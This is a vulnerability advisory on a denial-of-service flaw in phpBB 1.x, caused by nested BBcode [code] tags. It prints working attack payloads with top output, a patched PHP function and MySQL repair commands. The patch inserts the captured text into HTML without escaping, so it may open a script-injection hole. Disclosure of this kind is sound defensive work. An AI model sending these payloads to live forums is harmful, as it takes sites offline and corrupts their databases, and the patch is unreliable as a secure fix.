WSS (Whitecell Security Systems) has found a vulnerability in phpBB, an open source bulletin board created by the phpBB group. The vulnerability is triggered when phpBB processes nested "BBcode" tags. It allows an attacker to exhaust the web server's memory and CPU time (a denial of service) and to leave phpBB's database in an inconsistent state that makes the forums inaccessible until the half-written rows are removed by hand.
Credit:
The information has been provided by Whitecell Security Systems.
Affected Versions:
phpBB version 1.4.4
phpBB version 1.4.2
phpBB version 1.4.1
phpBB version 1.4.0
phpBB version 1.2.1
phpBB version 1.2.0
phpBB version 1.0.0
Not Affected Version:
phpBB version 2.x
phpBB supports nesting of "BBcode" tags, i.e. [code][/code], [quote][/quote], [list][/list]. The vulnerability arises from the way nested tags are encoded in the functions.php file: the encoding is applied repeatedly rather than once, so a small, specially formed post causes the stored text to be expanded many times over.
Exploit:
Submitting:
[code]
\0\0\0\0\0\0\0
[/code]
causes the following data to be saved to the database (the single block has been expanded into seven copies, one per \0, wrapped in [1code]...[/code1] markers):
[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]
Therefore, submitting this:
[code]'\0'*800[/code]
(i.e. [code], followed by 800 copies of \0, followed by [/code]) causes the httpd process to consume a large amount of memory and CPU time, as top shows:
whitecell$ top
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd
After some time phpBB reports:
"Could not enter post text!"
By then, however, two of the rows that make up the post have already been written while the post text itself has not, leaving the database inconsistent. Every subsequent access to the forum fails, and phpBB reports: "Could not connect to the forums database."
Submitting the following 49 bytes of data (three nested [code] blocks separated by \0):
[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]
causes httpd to use almost 100% of its CPU time, as top shows:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd
Workaround:
1) Disable BBcode until the vendor has issued a fix.
2) Replace bbencode_code() in functions.php with the following single-pass version, which matches each [code]...[/code] pair once, non-greedily, instead of re-processing nested tags:
function bbencode_code($message, $is_html_disabled)
{
	// Single pass, non-greedy: each [code]...[/code] pair is replaced exactly once,
	// so nested or malformed tags are left as literal text instead of being
	// expanded repeatedly. $is_html_disabled is kept only for signature compatibility.
	$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->", $message);
	return $message;
} // bbencode_code()
How to repair the database:
If the URL of the broken topic is: http://host/forums/viewtopic.php?topic=1162&forum=1&0
then the topic id is 1162. Take a backup of the database (e.g. with mysqldump) first, then use the following commands to remove the half-written topic; the post id (6280 in this example) is read from the topics row returned by the select:
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162;  -- note the post id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;